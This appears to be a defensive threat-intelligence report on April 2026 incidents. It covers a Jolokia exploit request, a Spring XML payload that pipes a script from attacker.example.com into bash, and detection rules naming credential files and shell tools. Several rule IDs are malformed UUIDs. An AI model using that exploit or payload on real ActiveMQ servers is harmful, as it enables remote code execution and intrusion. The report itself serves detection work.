26 April 2026: CrowdStrike publishes April 2026 Patch Tuesday analysis covering CVE-2026-33827 and CVE-2026-33826.
28 April 2026 (report date): SharePoint federal KEV deadline elapsed. Active exploitation ongoing.

Vercel and Context.AI OAuth Supply Chain:
Approximately February 2026: Context.AI employee infected with Lumma Stealer. OAuth tokens exfiltrated from the employee's machine. Source: Trend Micro (non-registry).
Approximately March 2026: Attacker uses stolen OAuth token to access a Vercel employee's Google Workspace. Internal Vercel system enumeration begins. Source: Trend Micro (non-registry).
Approximately 19 April 2026: Vercel publishes security bulletin. Breach attributed to Context.AI OAuth chain.
Approximately 19 April 2026: BreachForums listing of stolen Vercel customer environment variable data published at $2 million. Source: OX Security (non-registry).
28 April 2026 (report date): BreachForums listing active. Customer secret rotation ongoing.

ShinyHunters ADT and Medtronic:
Date not confirmed in registered sources: ShinyHunters conducts vishing attack against ADT employee's Okta SSO account. Salesforce exfiltration of 5.5 million individual records follows.
Approximately 27 to 28 April 2026: ADT publicly confirms breach. Medtronic confirms system access. BleepingComputer and Have I Been Pwned independently confirm the ADT dataset. ShinyHunters' dual extortion claims published.
28 April 2026 (report date): ADT investigation active. Medtronic data scope investigation ongoing. Regulatory notifications anticipated.

Chapter 04 - Detection Intelligence

GlassWorm OpenVSX Sleeper Wave: Invisible Code and Blockchain-Backed Command and Control

The GlassWorm campaign's current wave uses a multi-stage activation mechanism to evade detection at install time. The 73 cloned extensions are submitted to OpenVSX as functional copies of legitimate, popular developer tools. The malicious payload is not present in the initial published version. Instead, the attacker updates the extension after installation to load malicious JavaScript. This sleeper pattern specifically defeats point-in-time scanning of the marketplace and any review process that only examines the initial submission.

The payload itself uses invisible Unicode characters (specifically zero-width joiners and non-printing Unicode code points) embedded within otherwise normal-looking JavaScript source code. When rendered in a code editor, the source appears clean. When executed by the JavaScript engine, the invisible characters are interpreted as part of string literals or control structures, executing attacker-intended logic. This technique defeats visual code review entirely and evades many static analysis tools that do not normalize Unicode before analysis.

Once active, the malware communicates with attacker infrastructure using the Solana blockchain as a command and control channel. Instructions are encoded in Solana transaction data or on-chain account state, and the malware reads these values via legitimate Solana RPC API calls. Because traffic to Solana RPC endpoints (such as api.mainnet-beta.solana.com) is treated as normal web3 activity in most enterprise environments, this communication channel is not blocked by standard proxy or DNS filtering.

The payload targets: developer credential stores and SSH key directories, browser-stored credentials and session cookies, cryptocurrency wallet files (MetaMask vault files, hardware wallet connection data), and environment variables on the host. Stolen data is exfiltrated over HTTPS to attacker-controlled endpoints before the Solana C2 channel is used for follow-on instructions.

elementary-data PyPI Backdoor: GitHub Actions Script Injection and Signed Release Forgery

The attack exploited a well-documented but widely present misconfiguration in GitHub Actions workflows where user-controlled input from pull request events is interpolated directly into shell commands. The attacker submitted a pull request containing a malicious comment field. The elementary-data CI workflow was configured to use the pull request comment content in a shell step without sanitization, triggering execution of attacker-controlled commands in the runner environment.

The runner executed the injected code, which exfiltrated the GITHUB_TOKEN from the environment. With this token, the attacker created a signed commit and signed release tag for version 0.23.3, making it appear as a legitimate, maintainer-signed release. The release pipeline then built the PyPI package and multi-architecture Docker images from the attacker-controlled code, pushed them to PyPI under the elementary-data namespace, and pushed Docker images to GitHub Container Registry with tags 0.23.3 and latest.

The embedded infostealer payload executed on import of the package during pipeline runs. It targeted cloud provider credential files (AWS credentials file, GCP application default credentials, Azure CLI tokens), SSH private key directories, database connection strings in environment variables, and any CI/CD API tokens accessible to the running process. Data was exfiltrated via HTTPS POST to an attacker-controlled endpoint before the clean 0.23.4 release replaced the malicious build.

The use of a forged signed commit meant that standard provenance checks (verifying the release signature against the maintainer's GPG key) would appear valid, since the signature was generated using the legitimately exfiltrated GITHUB_TOKEN rather than a fake or compromised key. This distinguishes this attack from simpler typosquatting or unsigned package injection and elevates its detection difficulty.

Apache ActiveMQ CVE-2026-34197: Jolokia JMX Bridge to Spring Context Injection

Apache ActiveMQ Classic exposes a JMX-over-HTTP management interface via the Jolokia endpoint at /api/jolokia/ on the web console (default port 8161). The default Jolokia access policy (jolokia-access.xml) does not restrict exec operations on ActiveMQ MBeans in the org.apache.activemq:* namespace. This includes BrokerService.addNetworkConnector(String), which accepts a broker discovery URI.

The attacker sends a crafted HTTP POST:

POST /api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost/addNetworkConnector HTTP/1.1
Content-Type: application/json

{
  "type": "exec",
  "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
  "operation": "addNetworkConnector(java.lang.String)",
  "arguments": ["vm://localhost?brokerConfig=xbean:http://attacker.example.com/payload.xml"]
}

The brokerConfig parameter instructs the VM transport layer to fetch payload.xml from an attacker-controlled host and instantiate it as a Spring ResourceXmlApplicationContext. Spring processes all singleton bean definitions in that XML file before any ActiveMQ BrokerService validation occurs. A malicious payload.xml contains a bean definition invoking Runtime.exec() via a factory method:

<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="exec" class="java.lang.ProcessBuilder">
    <constructor-arg>
      <list>
        <value>bash</value>
        <value>-c</value>
        <value>curl http://attacker.example.com/shell.sh | bash</value>
      </list>
    </constructor-arg>
  </bean>
  <bean id="start" factory-bean="exec" factory-method="start"/>
</beans>

Exploitation requires valid credentials for the ActiveMQ web console. Default credentials (admin:admin) are widespread in unmanaged deployments. No authentication bypass is documented for this CVE. The resulting OS command execution runs in the context of the ActiveMQ service account, which in many deployments runs as root or a service account with broad filesystem and network access.

CISA KEV Expansion: SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X: Technical Mechanics

CVE-2024-57726 (SimpleHelp, CVSS 9.9): A missing authorization flaw in SimpleHelp's server-side API allows unauthenticated requests to perform privileged administrative actions on the SimpleHelp server. Exploitation gives an attacker the ability to create administrative accounts, access managed endpoints, and deploy payloads to all connected remote support clients without any valid credential. This makes SimpleHelp a direct ransomware pre-staging vector; an attacker who controls the SimpleHelp server controls every endpoint it manages.

CVE-2024-57728 (SimpleHelp): A companion path traversal vulnerability enabling arbitrary file read and write operations on the SimpleHelp server filesystem. In combination with CVE-2024-57726, this allows both administrative account creation and direct file system access, providing a reliable two-step exploitation chain.

CVE-2024-7399 (Samsung MagicINFO 9 Server, CVSS 8.8): An unauthenticated path traversal vulnerability allowing arbitrary file write as SYSTEM on the MagicINFO 9 Server. An attacker sends a crafted HTTP request to the content upload endpoint, bypassing directory restrictions via path traversal sequences in the filename parameter. The resulting file is written with SYSTEM privileges, making JSP web shell deployment straightforward. MagicINFO servers are commonly internet-accessible as they serve display content to networked digital signage hardware.

CVE-2025-29635 (D-Link DIR-823X, CVSS 7.5): A command injection vulnerability in the /goform/ endpoint of the D-Link DIR-823X firmware. Attacker-controlled input in a POST parameter is passed unsanitized to a shell command execution context. The device is classified as end-of-life by D-Link, and no patch will be issued. Continued operation of this device on any network connected to sensitive systems is indefensible.

Vercel and Context.AI OAuth Supply Chain: Delegated Trust Exploitation

The attack chain exploited OAuth 2.0 delegated trust without exploiting any vulnerability in Vercel's infrastructure. Context.AI, positioned as a productivity tool that integrates with Google Workspace, requested and received Google OAuth authorization scopes including drive.readonly from users who granted it access, including at least one Vercel employee.

A Lumma Stealer infection on the Context.AI employee's machine exfiltrated active OAuth tokens stored in the browser or application credential store. These tokens had not expired. The attacker used the stolen token to authenticate to Google APIs as Context.AI (specifically as the Vercel employee's authorized Context.AI session), accessing the employee's Google Drive. From the Drive, the attacker obtained credentials or access paths that enabled further pivot into Vercel's internal infrastructure.

Within Vercel's environment, the attacker enumerated customer project environment variables via the Vercel internal API. Vercel's platform did not encrypt non-Sensitive-flagged environment variables at rest, meaning plaintext API keys, database credentials, and cloud provider tokens were directly readable from the enumeration response. The attacker extracted this data and subsequently listed it on BreachForums.

The attack required no exploitation of a Vercel CVE, no network intrusion, and no malware deployment against Vercel systems directly. The entire compromise path ran through legitimate OAuth trust relationships and an infostealer infection at a third-party vendor. This is the structural risk of OAuth permission sprawl across AI productivity tool integrations.

Microsoft April 2026 KEV Cluster: SharePoint Spoofing, Excel Legacy RCE, Defender EoP

CVE-2026-32201 (SharePoint Server, CVSS 6.5): An improper input validation flaw in SharePoint Server 2016, 2019, and Subscription Edition allows an unauthenticated network-adjacent attacker to perform spoofing operations against SharePoint content. The precise exploit mechanism has not been publicly disclosed by Microsoft. Exploitation enables unauthorized viewing and modification of SharePoint data. The combination of low CVSS and confirmed active exploitation reflects a class of vulnerability that is operationally more dangerous than its score suggests because it enables silent data access without availability impact, making detection without proactive log analysis unlikely.

CVE-2009-0238 (Microsoft Excel, CVSS 9.3): A 17-year-old Excel formula parsing vulnerability that remains exploitable in unpatched environments. The attack vector is a maliciously crafted XLS or XLSB file delivered as an email attachment or downloaded from a malicious site. When Excel processes the crafted file, it triggers a memory corruption condition enabling arbitrary code execution in the context of the logged-in user. Its re-addition to the KEV catalog confirms active exploitation, indicating threat actors continue to target environments with legacy Office deployments or where the April 2026 patch has not been applied.

CVE-2026-33825 (Microsoft Defender, CVSS 7.8): Exploitation of the Defender signature update process to achieve local privilege escalation to SYSTEM. The precise mechanism is not publicly detailed by Microsoft. The fix is distributed automatically via Defender Antimalware Platform version 4.18.26030.3011. Air-gapped and update-restricted environments require manual delivery. As a local privilege escalation, exploitation requires an attacker to have already achieved local code execution on the endpoint. Post-exploitation utility is high: SYSTEM privileges enable credential dumping via LSASS, direct manipulation of EDR processes, and unrestricted lateral movement.

CVE-2026-33827 (Windows TCP/IP, CVSS 8.1) and CVE-2026-33826 (Windows Active Directory, CVSS 8.0): Both are patched with no confirmed active exploitation at report date. CVE-2026-33827 exploits a race condition (CWE-362) in the Windows TCP/IP stack, enabling unauthenticated remote code execution with no user interaction required, though at high attack complexity. CVE-2026-33826 requires authentication but carries low complexity and no user interaction requirement. Both represent high-value exploitation primitives for adversaries with the capability to develop reliable exploits. Prioritized patching is warranted.

ShinyHunters ADT and Medtronic: Vishing-to-CRM Exfiltration Kill Chain

ShinyHunters used voice phishing (vishing) to compromise an ADT employee's Okta SSO account. The specific vishing technique is not confirmed in registered sources, but the pattern is consistent with documented ShinyHunters and Scattered Spider methodology: the attacker calls the target employee or IT helpdesk posing as an internal support representative or contractor, convinces the target to provide a one-time passcode or to reset their Okta credentials, and then authenticates to the SSO platform using the obtained code or new credentials before the victim can act.

Once authenticated to Okta SSO, the attacker navigated to ADT's Salesforce instance using the compromised identity. No additional exploit was required. Salesforce, trusting the Okta SSO assertion, granted the attacker full access to the authenticated user's CRM data scope. The attacker then performed bulk data extraction of customer records including names, phone numbers, addresses, dates of birth, and the last four digits of SSNs or Tax IDs for a subset of the 5.5 million individuals in the dataset.

The Medtronic compromise follows a similar pattern. ShinyHunters has not disclosed the specific intrusion method. Medtronic has confirmed access to certain corporate IT systems without providing details on the attack vector. The parallel timing of both disclosures suggests a coordinated dual-extortion operation.

The structural lesson from the ADT attack chain is that a single successful vishing call against a non-technical employee or helpdesk agent with access to an SSO reset workflow is sufficient to unlock access to millions of customer records stored in a connected SaaS CRM. No zero-day, no malware, and no network intrusion is required. The entire kill chain runs through social engineering and legitimate platform authentication.

Confirmed Artifact Identifiers (, elementary-data incident):

Indicator

Type

Status

Action

elementary-data==0.23.3

PyPI package version string

Confirmed malicious

Block in all dependency manifests and SCA tooling

elementary-data:0.23.3

Docker image tag

Confirmed malicious

Block in container registries and image pull policies

elementary-data:latest

Docker image tag

Confirmed malicious during exposure window; reverted post-0.23.4

Treat any container pulled before 0.23.4 as potentially compromised; rebuild

No IP addresses, domain names, file hashes, or URL indicators are confirmed from registered sources across any of the seven incidents in the reporting window.

Non-Registry Hunting Pivots (not formally counted as confirmed IOCs; apply source weighting before operationalizing):

Apache ActiveMQ CVE-2026-34197:
Inbound POST requests to /api/jolokia/exec/ on TCP port 8161 from external IP ranges. Request body containing addNetworkConnector or addConnector with a URI value pointing to an external host. Outbound HTTP or HTTPS GET requests from the ActiveMQ JVM process (java.exe or the activemq service PID) to external hosts fetching XML files with Spring bean definitions. Both from Horizon3.ai (non-registry).

GlassWorm OpenVSX Sleeper Wave:
OpenVSX extension identifiers and publisher names for the 73 sleeper clones published by Socket Security (non-registry). Invisible Unicode character presence in extension JavaScript source (zero-width joiners, zero-width non-joiners, and similar non-printing code points). Outbound HTTPS requests to Solana RPC API endpoints (api.mainnet-beta.solana.com) from IDE or extension host processes. From Socket Security and Koi Security (non-registry).

Vercel and Context.AI OAuth Supply Chain:
Google Workspace admin audit log events of type AUTHORIZE_API_CLIENT_ACCESS where the client ID corresponds to Context.AI or other unrecognized AI productivity tools with broad Google Drive or Workspace scope. Vercel internal API calls to the project environment variable enumeration endpoint (/v9/projects/{id}/env) from non-employee IP ranges or unusual geographic locations. From Trend Micro and OX Security (non-registry).

ShinyHunters ADT and Medtronic:
No network infrastructure indicators published in registered sources. Hunting pivot: Salesforce bulk data export events (EventType = ReportExport or ListViewExport) from accounts that recently authenticated via Okta with unusual geographic location, new device, or after a credential reset event within the prior 24 hours. From BleepingComputer behavioral description (registered source).

Microsoft SharePoint CVE-2026-32201:
No published network IOCs from Microsoft or CISA. Hunting pivot: anomalous SharePoint access log entries showing cross-user content read or modify operations originating from a single authenticated session, particularly targeting high-privilege document libraries.

CISA KEV Expansion (SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X):
No network IOCs published in registered sources. Hunting pivot for Samsung MagicINFO 9: new or unexpected files with extensions .jsp, .php, or .aspx in the MagicINFO web root directory, indicating successful arbitrary file write exploitation via CVE-2024-7399.

All SIGMA rules below carry status: experimental. All YARA rules are written for network payload and artifact detection. All SIEM queries are written for Splunk SPL. Adapt field names to your environment's schema.

SIGMA: Apache ActiveMQ Jolokia RCE (CVE-2026-34197)

title: Apache ActiveMQ Jolokia Exec MBean RCE Attempt CVE-2026-34197
id: a7f3d921-4c2b-4e18-b0e7-9e82f1c5a3d0
status: experimental
description: >
  Detects HTTP POST exploitation of the ActiveMQ Jolokia JMX bridge
  targeting BrokerService MBeans for remote code execution via
  Spring ResourceXmlApplicationContext loading from external URI.
date: 2026-04-28
author: Inferlume CTI
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2026-34197
tags:
  - attack.initial_access
  - attack.t1190
  - attack.execution
  - attack.t1059.007
  - cve.2026-34197
logsource:
  category: webserver
  product: apache_activemq
detection:
  selection_method:
    cs-method: POST
  selection_path:
    cs-uri-stem|contains: /api/jolokia/
  selection_mbean_exec:
    cs-uri-stem|contains|any:
      - addNetworkConnector
      - addConnector
  selection_broker_config:
    cs-uri-query|contains|any:
      - brokerConfig
      - ResourceXmlApplicationContext
      - vm://
      - xbean:
  condition: >
    selection_method and selection_path and
    (selection_mbean_exec or selection_broker_config)
falsepositives:
  - Legitimate JMX tooling calling addNetworkConnector with internal URIs
  - Broker network replication setup scripts using xbean references
level: critical
fields:
  - cs-ip
  - cs-method
  - cs-uri-stem
  - cs-uri-query
  - sc-status

SIGMA: ActiveMQ JVM Process Spawning Unexpected Child Process

title: Apache ActiveMQ JVM Process Spawning Shell or Interpreter
id: b1f2e843-5d3a-4c17-a8b1-2e93g3e7c4b2
status: experimental
description: >
  Detects child process creation from the Apache ActiveMQ JVM service process,
  indicating possible post-exploitation command execution following
  CVE-2026-34197 Spring bean factory abuse.
date: 2026-04-28
author: Inferlume CTI
tags:
  - attack.execution
  - attack.t1059
  - cve.2026-34197
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith|any:
      - \java.exe
      - \javaw.exe
  selection_parent_cmdline:
    ParentCommandLine|contains|any:
      - activemq
      - activemq.jar
  selection_suspicious_child:
    Image|endswith|any:
      - \cmd.exe
      - \powershell.exe
      - \pwsh.exe
      - \wscript.exe
      - \cscript.exe
      - \mshta.exe
      - \curl.exe
      - \wget.exe
      - \certutil.exe
  condition: >
    selection_parent and selection_parent_cmdline and selection_suspicious_child
falsepositives:
  - ActiveMQ management scripts invoking Java tools legitimately
level: high
fields:
  - ParentImage
  - ParentCommandLine
  - Image
  - CommandLine
  - User

SIGMA: Microsoft Defender EoP SYSTEM Shell Spawn (CVE-2026-33825)

title: Suspicious SYSTEM Process Spawned from Microsoft Defender Components
id: b2e4c837-7f1a-4b29-a9c2-3d71e8f0b4a1
status: experimental
description: >
  Detects child process creation from Microsoft Defender update or antimalware
  components at SYSTEM integrity level, indicative of CVE-2026-33825 exploitation
  via Defender signature update process abuse.
date: 2026-04-28
author: Inferlume CTI
references:
  - https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2026-patch-tuesday-fixes-167-flaws-2-zero-days/
tags:
  - attack.privilege_escalation
  - attack.t1068
  - cve.2026-33825
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith|any:
      - \MsMpEng.exe
      - \mpam-fe.exe
      - \MpCmdRun.exe
      - \NisSrv.exe
  selection_suspicious_child:
    Image|endswith|any:
      - \cmd.exe
      - \powershell.exe
      - \pwsh.exe
      - \wscript.exe
      - \cscript.exe
      - \mshta.exe
      - \rundll32.exe
      - \regsvr32.exe
  selection_integrity:
    IntegrityLevel: System
  filter_expected:
    CommandLine|contains|any:
      - MpSigStub.exe
      - mpam-fe.exe
      - -SignatureUpdate
  condition: >
    selection_parent and selection_suspicious_child
    and selection_integrity and not filter_expected
falsepositives:
  - Unusual but legitimate Defender remediation actions
level: high
fields:
  - ParentImage
  - Image
  - CommandLine
  - IntegrityLevel
  - User

SIGMA: Suspicious Google Workspace OAuth Authorization for Broad Scope Apps

title: Broad-Scope Third-Party OAuth App Authorization in Google Workspace
id: c3d5e948-8a2b-4f30-b1d3-4e82g2d6b5e2
status: experimental
description: >
  Detects Google Workspace OAuth authorization events where third-party apps
  are granted broad Google Drive, Gmail, or admin directory access scopes.
  Pattern consistent with the Vercel and Context.AI supply chain attack chain
  and OAuth token theft campaigns targeting enterprise environments.
date: 2026-04-28
author: Inferlume CTI
tags:
  - attack.credential_access
  - attack.t1528
  - attack.t1195.002
logsource:
  product: google_workspace
  service: admin
detection:
  selection_event:
    eventName: AUTHORIZE_API_CLIENT_ACCESS
  selection_broad_scope:
    data.scope|contains|any:
      - https://www.googleapis.com/auth/drive
      - https://www.googleapis.com/auth/gmail
      - https://www.googleapis.com/auth/admin.directory
      - https://www.googleapis.com/auth/cloud-platform
  filter_approved_apps:
    data.client_id|startswith:
      - POPULATE_WITH_APPROVED_CLIENT_ID_LIST
  condition: selection_event and selection_broad_scope and not filter_approved_apps
falsepositives:
  - Legitimate business apps not yet on the approved list
level: high
fields:
  - actor.email
  - data.client_id
  - data.scope
  - ipAddress
  - time

SIGMA: GlassWorm Extension Host Process Network Anomaly (IDE to Solana RPC)

title: IDE or Extension Host Process Connecting to Solana RPC Endpoints
id: d4e6f059-9b3c-4g41-c2e4-5f93h3f8d6c3
status: experimental
description: >
  Detects outbound HTTPS connections from Visual Studio Code, its extension host
  process, or Node.js processes associated with IDE tooling to Solana RPC API
  endpoints. Consistent with GlassWorm blockchain-backed command and control
  activity from a malicious OpenVSX or VS Code extension.
date: 2026-04-28
author: Inferlume CTI
tags:
  - attack.command_and_control
  - attack.t1071.001
  - attack.t1195.002
logsource:
  category: network_connection
  product: windows
detection:
  selection_process:
    Image|endswith|any:
      - \Code.exe
      - \code
      - \extensionHost.exe
      - \node.exe
      - \node
  selection_destination:
    DestinationHostname|contains|any:
      - api.mainnet-beta.solana.com
      - api.devnet.solana.com
      - api.testnet.solana.com
      - solana-api.projectserum.com
      - rpc.ankr.com/solana
  selection_port:
    DestinationPort: 443
  condition: selection_process and selection_destination and selection_port
falsepositives:
  - Legitimate Solana development tools or blockchain developer environments
  - Web3 developer extensions that explicitly interact with Solana mainnet
level: high
fields:
  - Image
  - DestinationHostname
  - DestinationIp
  - DestinationPort
  - User

SIGMA: GlassWorm Credential File Access from IDE Process

title: IDE Process Accessing SSH Keys or Credential Stores Anomalously
id: e5f7g160-0c4d-4h52-d3f5-6g04i4g9e7d4
status: experimental
description: >
  Detects file access to SSH private key directories, browser credential
  databases, or cryptocurrency wallet files from Visual Studio Code or
  associated extension host processes. Consistent with GlassWorm payload
  targeting developer credential and wallet data on workstations.
date: 2026-04-28
author: Inferlume CTI
tags:
  - attack.credential_access
  - attack.t1552.001
logsource:
  category: file_access
  product: windows
detection:
  selection_process:
    Image|endswith|any:
      - \Code.exe
      - \extensionHost.exe
      - \node.exe
  selection_target_paths:
    TargetFilename|contains|any:
      - \.ssh\id_rsa
      - \.ssh\id_ed25519
      - \AppData\Roaming\MetaMask
      - \AppData\Local\Google\Chrome\User Data\Default\Login Data
      - \AppData\Roaming\Mozilla\Firefox\Profiles
      - \AppData\Local\Microsoft\Credentials
  condition: selection_process and selection_target_paths
falsepositives:
  - SSH extension tools that legitimately need key access for remote development
level: high
fields:
  - Image
  - TargetFilename
  - User
  - ProcessId

SIGMA: elementary-data Malicious Version in Dependencies or Running Process

title: Detection of elementary-data Version 0.23.3 Execution in CI or Pipeline
id: f6g8h271-1d5e-4i63-e4g6-7h15j5h0f8e5
status: experimental
description: >
  Detects execution or import of elementary-data version 0.23.3 in Python
  environments, CI pipelines, or container processes. Version 0.23.3 is a
  confirmed malicious release containing an infostealer payload distributed
  via a forged GitHub Actions signed release.
date: 2026-04-28
author: Inferlume CTI
tags:
  - attack.execution
  - attack.t1195.002
logsource:
  category: process_creation
  product: linux
detection:
  selection_pip_install:
    CommandLine|contains|all:
      - pip
      - elementary-data
      - 0.23.3
  selection_python_import:
    CommandLine|contains|all:
      - python
      - elementary
  selection_container_image:
    CommandLine|contains|any:
      - elementary-data:0.23.3
      - elementary-data:latest
  condition: >
    selection_pip_install or
    (selection_python_import) or
    selection_container_image
falsepositives:
  - False positive rate is low; this is a specific malicious version string
level: critical
fields:
  - CommandLine
  - Image
  - ParentCommandLine
  - User
  - Container

SIGMA: ShinyHunters Pattern: Okta Credential Reset Followed by CRM Bulk Export

title: Okta Credential Reset Followed by Salesforce Bulk Data Access
id: g7h9i382-2e6f-4j74-f5h7-8i26k6i1g9f6
status: experimental
description: >
  Detects a sequence consistent with the ShinyHunters ADT attack chain:
  an Okta user credential reset or MFA bypass event followed within a
  configurable window by a Salesforce bulk data export from the same user
  identity. Requires correlation across Okta and Salesforce log sources.
date: 2026-04-28
author: Inferlume CTI
tags:
  - attack.initial_access
  - attack.t1566.004
  - attack.t1078
  - attack.t1530
logsource:
  product: okta
  service: system_log
detection:
  selection_okta_reset:
    eventType|contains|any:
      - user.account.reset_password
      - user.mfa.factor.deactivate
      - user.session.impersonation.initiate
      - user.account.update_password
  timeframe: 4h
  selection_sfdc_bulk:
    eventType|contains|any:
      - ReportExport
      - ListViewExport
      - DataExport
  condition: >
    selection_okta_reset and selection_sfdc_bulk
    | correlate user.name within 4h
falsepositives:
  - Legitimate password resets by IT helpdesk followed by routine reporting
  - Scheduled Salesforce data exports after routine password updates
level: high
fields:
  - user.name
  - client.ipAddress
  - eventType
  - target.displayName
  - outcome.result

YARA: Apache ActiveMQ Jolokia RCE HTTP Payload (CVE-2026-34197)

rule ActiveMQ_Jolokia_RCE_HTTP_CVE_2026_34197
{
    meta:
        description  = "Detects HTTP POST payloads targeting Apache ActiveMQ Jolokia JMX bridge for CVE-2026-34197 RCE via Spring context loading"
        author       = "Inferlume CTI"
        date         = "2026-04-28"
        reference    = "https://nvd.nist.gov/vuln/detail/CVE-2026-34197"
        severity     = "critical"
        mitre_t      = "T1190, T1059.007"

    strings:
        $jolokia_path     = "/api/jolokia/" nocase ascii wide
        $mbean_broker     = "org.apache.activemq:type=Broker" nocase ascii
        $add_connector1   = "addNetworkConnector" nocase ascii
        $add_connector2   = "addConnector" nocase ascii
        $broker_cfg       = "brokerConfig" nocase ascii wide
        $vm_transport     = "vm://" nocase ascii
        $spring_xml       = "ResourceXmlApplicationContext" ascii
        $xbean_prefix     = "xbean:" nocase ascii

    condition:
        $jolokia_path and $mbean_broker
        and (1 of ($add_connector1, $add_connector2))
        and (1 of ($broker_cfg, $spring_xml, $vm_transport, $xbean_prefix))
}

YARA: Spring XML RCE Payload (ActiveMQ CVE-2026-34197 Stage 2)

rule Spring_XML_RCE_Payload_ActiveMQ_Stage2
{
    meta:
        description  = "Detects Stage 2 Spring XML application context payloads fetched during ActiveMQ CVE-2026-34197 exploitation containing Runtime.exec or ProcessBuilder invocations"
        author       = "Inferlume CTI"
        date         = "2026-04-28"
        severity     = "critical"
        note         = "Match on XML files retrieved by broker JVM from external hosts during Jolokia exploitation"

    strings:
        $spring_beans     = "<beans" nocase
        $runtime_exec     = "java.lang.Runtime" ascii
        $factory_method   = "factory-method" nocase ascii
        $process_builder  = "java.lang.ProcessBuilder" ascii
        $exec_keyword     = "\"exec\"" ascii
        $start_keyword    = "\"start\"" ascii

    condition:
        $spring_beans
        and ($runtime_exec or $process_builder)
        and ($factory_method or $exec_keyword or $start_keyword)
}

YARA: GlassWorm Invisible Unicode in JavaScript Extension Files

rule GlassWorm_Invisible_Unicode_JS_Extension
{
    meta:
        description  = "Detects JavaScript files containing invisible Unicode characters (zero-width joiners, zero-width non-joiners, and related non-printing code points) used by GlassWorm to conceal malicious logic in VS Code and OpenVSX extensions"
        author       = "Inferlume CTI"
        date         = "2026-04-28"
        severity     = "high"
        note         = "Apply to .js files in VS Code extension directories or OpenVSX downloaded artifacts"

    strings:
        $zwj             = { E2 80 8D }
        $zwnj            = { E2 80 8C }
        $zwsp            = { E2 80 8B }
        $wj              = { E2 81 A0 }
        $lrm             = { E2 80 8E }
        $rlm             = { E2 80 8F }
        $solana_rpc1     = "api.mainnet-beta.solana.com" ascii nocase
        $solana_rpc2     = "solana-api.projectserum.com" ascii nocase
        $credential_path = ".ssh/id_rsa" ascii nocase
        $wallet_path     = "MetaMask" ascii nocase

    condition:
        (2 of ($zwj, $zwnj, $zwsp, $wj, $lrm, $rlm))
        or (1 of ($solana_rpc1, $solana_rpc2))
        or (1 of ($credential_path, $wallet_path))
}

SIEM: Splunk SPL Queries

ActiveMQ Jolokia Exploitation (CVE-2026-34197):

index=proxy OR index=waf OR index=web_logs sourcetype=access_combined
| where like(uri_path, "%/api/jolokia/%")
| where http_method = "POST"
| where like(request_body, "%addNetworkConnector%")
      OR like(request_body, "%addConnector%")
      OR like(request_body, "%brokerConfig%")
      OR like(request_body, "%vm://%")
      OR like(request_body, "%xbean:%")
| eval threat_id="CVE-2026-34197",
       risk_score=95,
       action="ALERT"
| table _time, src_ip, dest_ip, uri_path, request_body, threat_id, risk_score, action
| sort -_time

ActiveMQ JVM Outbound Fetch of External XML:

index=network sourcetype=palo_alto OR sourcetype=cisco_asa
| where app = "web-browsing" OR app = "ssl"
| where like(dest_hostname, "%.xml") OR like(url, "%.xml")
| join type=left src_process [
    search index=endpoint sourcetype=sysmon EventCode=1
    | where like(Image, "%java%") OR like(ParentImage, "%activemq%")
    | table ProcessId, Image, ParentImage, CommandLine
  ]
| where isnotnull(Image)
| eval threat_id="CVE-2026-34197-Stage2",
       risk_score=90
| table _time, src_ip, dest_ip, dest_hostname, url, Image, CommandLine, threat_id

GlassWorm IDE Process to Solana RPC:

index=network sourcetype=firewall OR sourcetype=proxy
| where dest_host = "api.mainnet-beta.solana.com"
      OR dest_host = "api.devnet.solana.com"
      OR dest_host = "solana-api.projectserum.com"
| join type=left src_ip [
    search index=endpoint sourcetype=sysmon EventCode=3
    | where like(Image, "%Code.exe%")
          OR like(Image, "%extensionHost%")
          OR like(Image, "%node.exe%")
    | table src_ip, Image, User
  ]
| where isnotnull(Image)
| eval threat_campaign="GlassWorm",
       risk_score=80
| table _time, src_ip, dest_host, Image, User, threat_campaign, risk_score

ShinyHunters Pattern: Okta Reset Then Salesforce Bulk Export:

index=okta sourcetype=okta_system_log
| where eventType IN ("user.account.reset_password",
                      "user.mfa.factor.deactivate",
                      "user.session.impersonation.initiate")
| eval okta_reset_time = _time, okta_user = actor.alternateId
| join type=inner okta_user [
    search index=salesforce sourcetype=sfdc_event_log
    | where EventType IN ("ReportExport", "ListViewExport", "DataExport")
    | eval sfdc_export_time = _time, okta_user = UserId
    | table okta_user, sfdc_export_time, EventType, QueryString
  ]
| where (sfdc_export_time - okta_reset_time) <= 14400
| eval threat_pattern="ShinyHunters-OktaVishing-SalesforceExfil",
       risk_score=90
| table okta_reset_time, sfdc_export_time, okta_user, EventType, threat_pattern, risk_score
| sort -okta_reset_time

elementary-data 0.23.3 Execution in CI:

index=cicd OR index=endpoint sourcetype=sysmon OR sourcetype=jenkins_logs
| where like(CommandLine, "%elementary-data%") AND like(CommandLine, "%0.23.3%")
      OR like(CommandLine, "%elementary-data:0.23.3%")
      OR (like(CommandLine, "%elementary-data:latest%") AND
          date_mday >= 26 AND date_month = 4 AND date_year = 2026)
| eval threat_id="elementary-data-backdoor-0.23.3",
       risk_score=95,
       action="ISOLATE_AND_ROTATE_CREDENTIALS"
| table _time, host, User, CommandLine, threat_id, risk_score, action

No registered source in this report explicitly maps any incident to MITRE ATT&CK technique IDs. All mappings below are behaviorally inferred from attack mechanics described in source reporting. Where a technique is inferred, the behavioral basis is stated. Do not treat these as source-confirmed ATT&CK mappings.

Consolidated Technique Table:

Technique ID

Name

Incident

Basis

T1190

Exploit Public-Facing Application

Apache ActiveMQ CVE-2026-34197, CISA KEV Expansion

HTTP POST to internet-exposed Jolokia on port 8161; unauthenticated access to SimpleHelp and MagicINFO admin interfaces

T1059.007

Command and Scripting: JVM

Apache ActiveMQ CVE-2026-34197

Spring bean factory invoking Runtime.exec() via JMX bridge

T1505.003

Server Software Component: Web Shell

Samsung MagicINFO 9 CVE-2024-7399

Arbitrary file write as SYSTEM creates direct web shell deployment path

T1059.004

Command and Scripting: Unix Shell

D-Link DIR-823X CVE-2025-29635

Command injection via POST to /goform/ endpoint

T1195.002

Supply Chain Compromise: Software Supply Chain

GlassWorm, elementary-data, Vercel

